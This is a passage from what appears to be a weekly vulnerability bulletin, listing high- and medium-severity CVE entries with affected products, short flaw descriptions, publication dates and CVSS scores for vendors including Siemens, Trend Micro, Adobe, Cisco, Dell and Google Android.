siemens — simatic_et_200_sp_open_controller_cpu_1515sp_pc2_firmware	A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V2.9.2), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants) (All versions), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions < V21.9), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions < V4.5.0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions < V2.9.2), SIMATIC S7-1500 Software Controller (All versions < V21.9), SIMATIC S7-PLCSIM Advanced (All versions < V4.0). Affected products protect the built-in global private key in a way that cannot be considered sufficient any longer. The key is used for the legacy protection of confidential configuration data and the legacy PG/PC and HMI communication. This could allow attackers to discover the private key of a CPU product family by an offline attack against a single CPU of the family. Attackers could then use this knowledge to extract confidential configuration data from projects that are protected by that key or to perform attacks against legacy PG/PC and HMI communication.	2022-10-11	7.8	CVE-2022-38465 MISC
siemens — simatic_hmi_comfort_panels_firmware	A vulnerability has been identified in SIMATIC HMI Comfort Panels (incl. SIPLUS variants) (All versions < V17 Update 4), SIMATIC HMI KTP Mobile Panels (All versions < V17 Update 4), SIMATIC HMI KTP1200 Basic (All versions < V17 Update 5), SIMATIC HMI KTP400 Basic (All versions < V17 Update 5), SIMATIC HMI KTP700 Basic (All versions < V17 Update 5), SIMATIC HMI KTP900 Basic (All versions < V17 Update 5), SIPLUS HMI KTP1200 BASIC (All versions < V17 Update 5), SIPLUS HMI KTP400 BASIC (All versions < V17 Update 5), SIPLUS HMI KTP700 BASIC (All versions < V17 Update 5), SIPLUS HMI KTP900 BASIC (All versions < V17 Update 5). Affected devices do not properly validate input sent to certain services over TCP. This could allow an unauthenticated remote attacker to cause a permanent denial of service condition (requiring a device reboot) by sending specially crafted TCP packets.	2022-10-11	7.5	CVE-2022-40227 MISC
siemens — solid_edge	A vulnerability has been identified in Solid Edge (All Versions < SE2022MP9). The affected application contains an out of bounds write past the fixed-length heap-based buffer while parsing specially crafted DWG files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-17627)	2022-10-11	7.8	CVE-2022-37864 MISC
simple_cold_storage_management_system_project — simple_cold_storage_managment_system	Simple Cold Storage Management System v1.0 is vulnerable to SQL Injection via /csms/admin/?page=user/manage_user&id=.	2022-10-11	7.2	CVE-2022-42230 MISC
simple_online_public_access_catalog_project — simple_online_public_access_catalog	A vulnerability has been found in SourceCodester Simple Online Public Access Catalog 1.0 and classified as critical. This vulnerability affects unknown code of the file /opac/Actions.php?a=login of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210784.	2022-10-14	7.2	CVE-2022-3495 MISC MISC
slack_morphism_project — slack_morphism	Slack Morphism is a modern client library for Slack Web/Events API/Socket Mode and Block Kit. Debug logs expose sensitive URLs for Slack webhooks that contain private information. The problem is fixed in version 1.3.2 which redacts sensitive URLs for webhooks. As a workaround, people who use Slack webhooks may disable or filter debug logs.	2022-10-10	7.5	CVE-2022-39292 CONFIRM MISC
sonicwall — global_management_system	SonicWall GMS is vulnerable to file path manipulation resulting that an unauthenticated attacker can gain access to web directory containing application’s binaries and configuration files.	2022-10-13	7.5	CVE-2021-20030 CONFIRM
tenda — ac1206_firmware	Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via the function formWifiBasicSet.	2022-10-12	7.5	CVE-2022-42079 MISC
tenda — ac1206_firmware	Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a heap overflow via sched_start_time parameter.	2022-10-12	7.5	CVE-2022-42080 MISC
tenda — ac1206_firmware	Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via sched_end_time parameter.	2022-10-12	7.5	CVE-2022-42081 MISC
traefik — traefik	Traefik (pronounced traffic) is a modern HTTP reverse proxy and load balancer that assists in deploying microservices. There is a potential vulnerability in Traefik managing HTTP/2 connections. A closing HTTP/2 server connection could hang forever because of a subsequent fatal error. This failure mode could be exploited to cause a denial of service. There has been a patch released in versions 2.8.8 and 2.9.0-rc5. There are currently no known workarounds.	2022-10-11	7.5	CVE-2022-39271 MISC CONFIRM MISC
trendmicro — apex_one	A forced browsing vulnerability in Trend Micro Apex One could allow an attacker with access to the Apex One console on affected installations to escalate privileges and modify certain agent groupings. Please note: an attacker must first obtain the ability to log onto the Apex One web console in order to exploit this vulnerability.	2022-10-10	9.1	CVE-2022-41746 MISC MISC
trendmicro — apex_one	An improper certification validation vulnerability in Trend Micro Apex One agents could allow a local attacker to load a DLL file with system service privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.	2022-10-10	7.8	CVE-2022-41747 MISC MISC
trendmicro — apex_one	An origin validation error vulnerability in Trend Micro Apex One agents could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.	2022-10-10	7.8	CVE-2022-41749 MISC MISC
trendmicro — apex_one	A Time-of-Check Time-Of-Use vulnerability in the Trend Micro Apex One Vulnerability Protection integrated component could allow a local attacker to escalate privileges and turn a specific working directory into a mount point on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.	2022-10-10	7	CVE-2022-41744 MISC MISC
trendmicro — apex_one	An Out-of-Bounds access vulnerability in Trend Micro Apex One could allow a local attacker to create a specially crafted message to cause memory corruption on a certain service process which could lead to local privilege escalation on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.	2022-10-10	7	CVE-2022-41745 MISC MISC
vmware — vcenter_server	The vCenter Server contains an unsafe deserialisation vulnerability in the PSC (Platform services controller). A malicious actor with admin access on vCenter server may exploit this issue to execute arbitrary code on the underlying operating system that hosts the vCenter Server.	2022-10-07	9.1	CVE-2022-31680 MISC MISC
wayos — lq-09_firmware	WAYOS LQ_09 22.03.17V was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to send crafted requests to the server from the affected device. This vulnerability is exploitable due to a lack of authentication in the component Usb_upload.htm.	2022-10-13	8.1	CVE-2022-41489 MISC
web-based_student_clearance_system_project — web-based_student_clearance_system	A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-210367.	2022-10-09	7.5	CVE-2022-3436 MISC
webpack.js — loader-utils	Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils 2.0.0 via the name variable in parseQuery.js.	2022-10-12	9.8	CVE-2022-37601 MISC MISC MISC
webpack.js — loader-utils	A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js.	2022-10-11	7.5	CVE-2022-37599 MISC MISC MISC
wedding_planner_project — wedding_planner	Wedding Planner v1.0 is vulnerable to arbitrary code execution.	2022-10-07	9.8	CVE-2022-42075 MISC MISC
wedding_planner_project — wedding_planner	Wedding Planner v1.0 is vulnerable to arbitrary code execution via users_profile.php.	2022-10-11	8.8	CVE-2022-42034 MISC
wedding_planner_project — wedding_planner	Wedding Planner v1.0 is vulnerable to Arbitrary code execution via package_edit.php.	2022-10-11	8.8	CVE-2022-42229 MISC
wijungle — u250_firmware	WiJungle NGFW Version U250 was discovered to be vulnerable to No Rate Limit attack, allowing the attacker to brute force the admin password leading to Account Take Over.	2022-10-12	9.8	CVE-2022-33106 MISC MISC
woo_billingo_plus_project — woo_billingo_plus	The Woo Billingo Plus WordPress plugin before 4.4.5.4, Integration for Billingo & Gravity Forms WordPress plugin before 1.0.4, Integration for Szamlazz.hu & Gravity Forms WordPress plugin before 1.2.7 are lacking CSRF checks in various AJAX actions, which could allow attackers to make logged in Shop Managers and above perform unwanted actions, such as deactivate the plugin’s license	2022-10-10	7.1	CVE-2022-3154 MISC
xmldom_project — xmldom	A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package before 0.8.3 for Node.js via the p variable.	2022-10-11	9.8	CVE-2022-37616 MISC MISC MISC MISC
zkteco — zkbiosecurity_v5000	An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.	2022-10-07	8.8	CVE-2022-36634 MISC MISC MISC
zkteco — zkbiosecurity_v5000	ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.	2022-10-07	8.8	CVE-2022-36635 MISC MISC MISC
zoneminder — zoneminder	ZoneMinder is a free, open source Closed-circuit television software application. In affected versions the ZoneMinder API Exposes Database Log contents to user without privileges, allows insertion, modification, deletion of logs without System Privileges. Users are advised yo upgrade as soon as possible. Users unable to upgrade should disable database logging.	2022-10-07	7.5	CVE-2022-39289 MISC CONFIRM

Medium Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
adguard — adguardhome	In AdGuardHome, versions v0.95 through v0.108.0-b.13 are vulnerable to Cross-Site Request Forgery (CSRF), in the custom filtering rules functionality. An attacker can persuade an authorized user to follow a malicious link, resulting in deleting/modifying the custom filtering rules.	2022-10-11	4.3	CVE-2022-32175 MISC MISC
adobe — acrobat_reader	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-35691 MISC
adobe — acrobat_reader	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-38437 MISC
adobe — acrobat_reader	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-38449 MISC
adobe — acrobat_reader	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-42342 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction, but does require administrator privileges.	2022-10-14	4.9	CVE-2022-38423 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.	2022-10-14	5.9	CVE-2022-38419 MISC
adobe — commerce	Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the availability of a user’s minor feature. Exploitation of this issue does not require user interaction.	2022-10-14	5.3	CVE-2022-35689 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-38443 MISC
arubanetworks — instant	An unauthenticated Denial of Service (DoS) vulnerability exists in the handling of certain SSID strings by Aruba InstantOS and ArubaOS 10. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected AP of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability.	2022-10-07	6.5	CVE-2022-37894 MISC
arubanetworks — instant	A vulnerability in the Aruba InstantOS and ArubaOS 10 web management interface could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability.	2022-10-07	6.1	CVE-2022-37896 MISC
arubanetworks — instant	A vulnerability in the Aruba InstantOS and ArubaOS 10 web management interface could allow an unauthenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address this security vulnerability.	2022-10-07	5.4	CVE-2022-37892 MISC
arubanetworks — instant	An unauthenticated Denial of Service (DoS) vulnerability exists in the handling of certain SSID strings by Aruba InstantOS and ArubaOS 10. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected AP of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability.	2022-10-07	4.9	CVE-2022-37895 MISC
asset_cleanup — _page_speed_booster_project	Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan’s Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress.	2022-10-11	4.8	CVE-2021-36899 CONFIRM CONFIRM
avaya — aura_communication_manager	Privilege escalation related vulnerabilities were discovered in Avaya Aura Communication Manager that may allow local administrative users to escalate their privileges. This issue affects Communication Manager versions 8.0.0.0 through 8.1.3.3 and 10.1.0.0.	2022-10-12	6.7	CVE-2022-2249 CONFIRM
bevywise — mqttroute	A cross-site scripting (XSS) vulnerability in MQTTRoute v3.3 and below allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the dashboard name text field.	2022-10-13	5.4	CVE-2022-35612 MISC
bevywise — mqttroute	A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards.	2022-10-13	4.3	CVE-2022-35611 MISC
boodskap — iot_platform	Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests.	2022-10-13	6.5	CVE-2022-35136 MISC
boodskap — iot_platform	Boodskap IoT Platform v4.4.9-02 contains a cross-site scripting (XSS) vulnerability.	2022-10-13	5.4	CVE-2022-35134 MISC
book_store_management_system_project — book_store_management_system	A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /category.php. The manipulation of the argument category_name leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-210436.	2022-10-11	5.4	CVE-2022-3452 MISC
book_store_management_system_project — book_store_management_system	A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /transcation.php. The manipulation of the argument buyer_name leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-210437 was assigned to this vulnerability.	2022-10-11	5.4	CVE-2022-3453 MISC
brainvire — disable_user_login	The Disable User Login WordPress plugin through 1.0.1 does not have authorisation and CSRF checks when updating its settings, allowing unauthenticated attackers to block (or unblock) users at will.	2022-10-10	5.3	CVE-2022-2350 MISC
cert — vince	An HTML injection vulnerability exists in CERT/CC VINCE software prior to 1.50.4. An authenticated attacker can inject arbitrary HTML via form using the “Product Affected” field.	2022-10-10	5.4	CVE-2022-40248 MISC
cert — vince	An HTML injection vulnerability exists in CERT/CC VINCE software prior to 1.50.4. An authenticated attacker can inject arbitrary HTML via a crafted email with HTML content in the Subject field.	2022-10-10	5.4	CVE-2022-40257 MISC
cisco — ios_xe	A vulnerability in the software image verification functionality of Cisco IOS XE Software for Cisco Catalyst 9200 Series Switches could allow an unauthenticated, physical attacker to execute unsigned code at system boot time. This vulnerability is due to an improper check in the code function that manages the verification of the digital signatures of system image files during the initial boot process. An attacker could exploit this vulnerability by loading unsigned software on an affected device. A successful exploit could allow the attacker to boot a malicious software image or execute unsigned code and bypass the image verification check part of the boot process of the affected device. To exploit this vulnerability, the attacker needs either unauthenticated physical access to the device or privileged access to the root shell on the device. Note: In Cisco IOS XE Software releases 16.11.1 and later, root shell access is protected by the Consent Token mechanism. However, an attacker with level-15 privileges could easily downgrade the Cisco IOS XE Software running on a device to a release where root shell access is more readily available.	2022-10-10	6.8	CVE-2022-20944 CISCO
cisco — ios_xe_rom_monitor	A vulnerability in the password-recovery disable feature of Cisco IOS XE ROM Monitor (ROMMON) Software for Cisco Catalyst Switches could allow an unauthenticated, local attacker to recover the configuration or reset the enable password. This vulnerability is due to a problem with the file and boot variable permissions in ROMMON. An attacker could exploit this vulnerability by rebooting the switch into ROMMON and entering specific commands through the console. A successful exploit could allow the attacker to read any file or reset the enable password.	2022-10-10	4.6	CVE-2022-20864 CISCO
cisco — sd-wan_vmanage	A vulnerability in authentication mechanism of Cisco Software-Defined Application Visibility and Control (SD-AVC) on Cisco vManage could allow an unauthenticated, remote attacker to access the GUI of Cisco SD-AVC without authentication. This vulnerability exists because the GUI is accessible on self-managed cloud installations or local server installations of Cisco vManage. An attacker could exploit this vulnerability by accessing the exposed GUI of Cisco SD-AVC. A successful exploit could allow the attacker to view managed device names, SD-AVC logs, and SD-AVC DNS server IP addresses.	2022-10-10	5.3	CVE-2022-20830 CISCO
cozmoslabs — profile_builder	Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin <= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on.	2022-10-11	4.3	CVE-2021-36915 CONFIRM CONFIRM
crealogix — ebics_server	A vulnerability was found in Crealogix EBICS 7.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /ebics-server/ebics.aspx. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 7.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-210374 is the identifier assigned to this vulnerability.	2022-10-10	6.1	CVE-2022-3442 N/A N/A
d-bus_project — d-bus	An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message with certain invalid type signatures.	2022-10-10	6.5	CVE-2022-42010 CONFIRM MISC FEDORA
d-bus_project — d-bus	An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message where an array length is inconsistent with the size of the element type.	2022-10-10	6.5	CVE-2022-42011 CONFIRM MISC FEDORA
d-bus_project — d-bus	An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.	2022-10-10	6.5	CVE-2022-42012 CONFIRM MISC FEDORA
dell — alienware_area_51m_r1_firmware	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.	2022-10-12	4.4	CVE-2022-32483 MISC
dell — alienware_area_51m_r1_firmware	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.	2022-10-12	4.4	CVE-2022-32484 MISC
dell — cloud_mobility_for_dell_emc_storage	Cloud Mobility for Dell Storage versions 1.3.0 and earlier contains an Improper Access Control vulnerability within the Postgres database. A threat actor with root level access to either the vApp or containerized versions of Cloud Mobility may potentially exploit this vulnerability, leading to the modification or deletion of tables that are required for many of the core functionalities of Cloud Mobility. Exploitation may lead to the compromise of integrity and availability of the normal functionality of the Cloud Mobility application.	2022-10-11	6.7	CVE-2022-34434 MISC
dell — geodrive	Dell GeoDrive, Versions 2.1 – 2.2, contains an information disclosure vulnerability. An authenticated non-admin user could potentially exploit this vulnerability and gain access to sensitive information.	2022-10-12	5.5	CVE-2022-33918 MISC
dell — hybrid_client	Dell Hybrid Client below 1.8 version contains a guest user profile corruption vulnerability. A WMS privilege attacker could potentially exploit this vulnerability, leading to DHC system not being accessible.	2022-10-11	6.5	CVE-2022-34431 MISC
dell — wyse_thinos	Dell Wyse ThinOS 2205 contains a Regular Expression Denial of Service Vulnerability in UI. An admin privilege attacker could potentially exploit this vulnerability, leading to denial-of-service.	2022-10-10	4.9	CVE-2022-34402 MISC
eng — knowage	Knowage is an open source suite for modern business analytics alternative over big data systems. KnowageLabs / Knowage-Server starting with the 6.x branch and prior to versions 7.4.22, 8.0.9, and 8.1.0 is vulnerable to cross-site scripting because the `XSSRequestWrapper::stripXSS` method can be bypassed. Versions 7.4.22, 8.0.9, and 8.1.0 contain patches for this issue. There are no known workarounds.	2022-10-13	6.1	CVE-2022-39295 CONFIRM MISC
fatfreecrm — fatfreecrm	fat_free_crm is a an open source, Ruby on Rails customer relationship management platform (CRM). In versions prior to 0.20.1 an authenticated user can perform a remote Denial of Service attack against Fat Free CRM via bucket access. The vulnerability has been patched in commit `c85a254` and will be available in release `0.20.1`. Users are advised to upgrade or to manually apply patch `c85a254`. There are no known workarounds for this issue.	2022-10-08	6.5	CVE-2022-39281 MISC MISC CONFIRM
flatpress — flatpress	Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.	2022-10-11	5.4	CVE-2022-40047 MISC MISC
fontmeister_project — fontmeister	Reflected Cross-Site Scripting (XSS) vulnerability FontMeister plugin <= 1.08 at WordPress.	2022-10-11	6.1	CVE-2022-33978 CONFIRM CONFIRM
fortinet — fortimanager	An exposure of resource to wrong sphere vulnerability [CWE-668] in FortiAnalyzer and FortiManager GUI 7.0.0 through 7.0.3, 6.4.0 through 6.4.8, 6.2.0 through 6.2.9, 6.0.0 through 6.0.11, 5.6.0 through 5.6.11 may allow an unauthenticated and remote attacker to access report template images via referencing the name in the URL path.	2022-10-10	5.3	CVE-2022-26121 CONFIRM
getshortcodes — shortcodes_ultimate	Cross-Site Request Forgery (CSRF) vulnerability in Shortcodes Ultimate plugin <= 5.12.0 at WordPress leading to plugin preset settings change.	2022-10-11	4.3	CVE-2022-38086 CONFIRM CONFIRM
gin-vue-admin_project — gin-vue-admin	In “Gin-Vue-Admin”, versions v2.5.1 through v2.5.3beta are vulnerable to Unrestricted File Upload that leads to execution of javascript code, through the ‘Normal Upload’ functionality to the Media Library. When an admin user views the uploaded file, a low privilege attacker will get access to the admin’s cookie leading to account takeover.	2022-10-14	5.4	CVE-2022-32177 CONFIRM MISC
gnu — osip	GNU oSIP v5.3.0 was discovered to contain an integer overflow via the component osip_body_parse_header.	2022-10-11	6.5	CVE-2022-41550 MISC
google — android	In io_identity_cow of io_uring.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238177383References: Upstream kernel	2022-10-11	6.7	CVE-2022-20409 MISC
google — android	In fdt_next_tag of fdt.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-230794395	2022-10-11	6.7	CVE-2022-20412 MISC
google — android	In isp, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262305; Issue ID: ALPS07262305.	2022-10-07	6.7	CVE-2022-26452 MISC
google — android	In vdec fmt, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07342197; Issue ID: ALPS07342197.	2022-10-07	6.7	CVE-2022-26473 MISC
google — android	In sensorhub, there is a possible out of bounds write due to an incorrect calculation of buffer size. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07129717; Issue ID: ALPS07129717.	2022-10-07	6.7	CVE-2022-26474 MISC
google — android	In wlan, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310743; Issue ID: ALPS07310743.	2022-10-07	6.7	CVE-2022-26475 MISC
google — android	In wlan, there is a possible use after free due to an incorrect status check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07299425; Issue ID: ALPS07299425.	2022-10-07	6.7	CVE-2022-32590 MISC
google — android	In cpu dvfs, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07139405; Issue ID: ALPS07139405.	2022-10-07	6.7	CVE-2022-32592 MISC
google — android	In vowe, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07138493; Issue ID: ALPS07138493.	2022-10-07	6.7	CVE-2022-32593 MISC
google — android	In queryInternal of CallLogProvider.java, there is a possible access to voicemail information due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-224771921	2022-10-11	5.5	CVE-2022-20351 MISC
google — android	In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-235850634	2022-10-11	5.5	CVE-2022-20413 MISC
google — android	In addAutomaticZenRule of ZenModeHelper.java, there is a possible permanent degradation of performance due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-235823407	2022-10-11	5.5	CVE-2022-20425 MISC
google — android	In Messaging, There has unauthorized broadcast, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242258929	2022-10-11	5.5	CVE-2022-20437 MISC
google — android	In Messaging, There has unauthorized broadcast, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242259920	2022-10-11	5.5	CVE-2022-20438 MISC
google — android	In Messaging, There has unauthorized provider, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242266172	2022-10-11	5.5	CVE-2022-20439 MISC
google — android	In Messaging, There has unauthorized broadcast, this could cause Local Deny of Service.Product: AndroidVersions: Android SoCAndroid ID: A-242259918	2022-10-11	5.5	CVE-2022-20440 MISC
google — android	In various functions of ap_input_processor.c, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-236042696References: N/A	2022-10-14	5.5	CVE-2022-20464 MISC
google — android	Use after free vulnerability in set_nft_pid and signal_handler function of NFC driver prior to SMR Oct-2022 Release 1 allows attackers to perform malicious actions.	2022-10-07	5.3	CVE-2022-39847 MISC
google — android	In getInputMethodWindowVisibleHeight of InputMethodManagerService.java, there is a possible way to determine when another app is showing an IME due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-204906124	2022-10-11	5	CVE-2022-20394 MISC
google — android	In rndis_set_response of rndis.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if a malicious USB device is attached with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239842288References: Upstream kernel	2022-10-11	4.6	CVE-2022-20423 MISC
google — android	Improper access control vulnerability in FACM application prior to SMR Oct-2022 Release 1 allows a local attacker to connect arbitrary AP and Bluetooth devices.	2022-10-07	4.3	CVE-2022-39855 MISC
hashicorp — nomad	HashiCorp Nomad and Nomad Enterprise 1.0.2 up to 1.2.12, and 1.3.5 jobs submitted with an artifact stanza using invalid S3 or GCS URLs can be used to crash client agents. Fixed in 1.2.13, 1.3.6, and 1.4.0.	2022-10-12	6.5	CVE-2022-41606 MISC MISC
